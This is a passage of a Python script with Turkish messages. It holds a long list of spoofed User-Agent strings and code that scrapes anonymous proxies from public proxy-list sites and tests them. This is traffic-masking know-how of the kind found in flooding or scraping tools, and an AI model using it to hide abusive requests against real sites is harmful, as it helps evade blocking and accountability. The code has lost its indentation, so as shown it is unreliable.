"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0",
]
nurls = ["http://www.aliveproxy.com/high-anonymity-proxy-list/", "http://www.aliveproxy.com/anonymous-proxy-list/",
"http://www.aliveproxy.com/fastest-proxies/", "http://www.aliveproxy.com/us-proxy-list/", "http://www.aliveproxy.com/gb-proxy-list/",
"http://www.aliveproxy.com/fr-proxy-list/", "http://www.aliveproxy.com/de-proxy-list/", "http://www.aliveproxy.com/jp-proxy-list/",
"http://www.aliveproxy.com/ca-proxy-list/", "http://www.aliveproxy.com/ru-proxy-list/", "http://www.aliveproxy.com/proxy-list-port-80/",
"http://www.aliveproxy.com/proxy-list-port-81/", "http://www.aliveproxy.com/proxy-list-port-3128/", "http://www.aliveproxy.com/proxy-list-port-8000/",
"http://www.aliveproxy.com/proxy-list-port-8080/", "http://webanetlabs.net/publ/24", "http://www.proxz.com/proxy_list_high_anonymous_0.html",
"http://www.proxz.com/proxy_list_anonymous_us_0.html", "http://www.proxz.com/proxy_list_uk_0.html", "http://www.proxz.com/proxy_list_ca_0.html",
"http://www.proxz.com/proxy_list_cn_ssl_0.html", "http://www.proxz.com/proxy_list_jp_0.html", "http://www.proxz.com/proxy_list_fr_0.html",
"http://www.proxz.com/proxy_list_port_std_0.html", "http://www.proxz.com/proxy_list_port_nonstd_0.html", "http://www.proxz.com/proxy_list_transparent_0.html",
"http://www.proxylists.net/", "https://www.my-proxy.com/free-proxy-list.html","https://www.my-proxy.com/free-elite-proxy.html",
"https://www.my-proxy.com/free-anonymous-proxy.html", "https://www.my-proxy.com/free-transparent-proxy.html","https://jffjdjkbfek.000webhostapp.com/proxy.txt"]
def proxyget(url):
try:
req = urllib.request.Request(url)
req.add_header("User-Agent", random.choice(useragents))
sourcecode = urllib.request.urlopen(req, timeout = 10)
for line in sourcecode :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
ipf = list(filter(lambda x: x if not x.startswith("0.") else None, ip))
if ipf:
for x in ipf:
ipfinal = x
out_file = open("proxy.txt","a")
while True:
out_file.write(x+"\n")
out_file.close()
break
except:
print("\033[1;31m \nAh Bu Site Çalısmıyor.")
def proxyget2(url):
try:
req = urllib.request.Request((url))
req.add_header("User-Agent", random.choice(useragents))
sourcecode = urllib.request.urlopen(req, timeout=10)
part = str(sourcecode.read())
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("proxy.txt","a")
out_file.write(proxies)
out_file.close()
except:
print("\033[0;31m \nAh Bu Site Çalısmıyor.")
def blogspotget(url, word, word2):
try:
soup = BeautifulSoup(urllib.request.urlopen(url))
for tag in soup.find_all(word2, word):
links = tag.a.get("href")
result = urllib.request.urlopen(links)
for line in result :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line))
if ip:
for x in ip:
out_file = open("proxy.txt","a")
while True:
out_file.write(x+"\n")
out_file.close()
break
except:
print("\nAh Bu Site Çalısmıyor.")
def proxylist():
global proxies
print (" \nProxyler Kontrol Ediliyor")
proxies = open("proxy.txt").readlines()
proxiesp = []
for i in proxies:
if i not in proxiesp:
proxiesp.append(i)
filepr = open("proxy.txt", "w")
filepr.close()
filepr = open("proxy.txt", "a")
for i in proxiesp:
filepr.write(i)
print("\033[34m Var Olan Ipiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;32m\nProxylist Guncellendi!\n")
def proxycheckerinit():
global out_file
candidate_proxies = open("proxy.txt").readlines()
filedl = open("proxy.txt", "w")
filedl.close()
out_file = open("proxy.txt", "a")
for i in candidate_proxies:
threading.Thread(target=proxychecker, args=[i]).start()
def proxychecker(i):
proxy = 'http://' + i
proxy_support = urllib.request.ProxyHandler({'http' : proxy})
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
try:
urllib.request.urlopen("http://www.google.com", timeout=10)
print ("\033[32m %s Çalısıyor!\n\n" % proxy)
out_file.write(i)
except:
print ("\033[1;31m %s Ulasılamıyor.\n\n" % proxy)
def main():
try:
out_file = open("proxy.txt","w")
out_file.close()
print (" \nProxyler İndriliyor")
url = "http://free-proxy-list.net/"
proxyget2(url)
url = "https://www.us-proxy.org/"
proxyget2(url)
print("\033m[34m Var Olan İpiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;33m \nProxyler İndriliyor\n")
url = "http://www.proxyserverlist24.top/"
word = "post-title entry-title"
word2 = "h3"
blogspotget(url,word, word2)
url = "https://proxylistdaily4you.blogspot.com/"
word = "post-body entry-content"
word2 = "div"
blogspotget(url,word,word2)
print("\033[34m Var Olan İpiler: %s" % (len(open("proxy.txt").readlines())))
print ("\033[1;33m \nIndiriliyor...")
for position, url in enumerate(nurls):
proxyget(url)
print("\033[34m İndirme Tamamlandı: (%s/%s)\nVar Olan İpiler: %s" % (position+1, len(nurls), len(open("proxy.txt").readlines())))
print ("\033[34m \nDownloading from foxtools in progress...")
foxtools = ['http://api.foxtools.ru/v2/Proxy.txt?page=%d' % n for n in range(1, 6)]
for position, url in enumerate(foxtools):
proxyget(url)
print("\033[34m Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
proxylist()
print("\n")
while True:
choice = input("\033[35m \nProxyleri Kontrol Etmek İstermisin? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes':
proxycheckerinit()
break
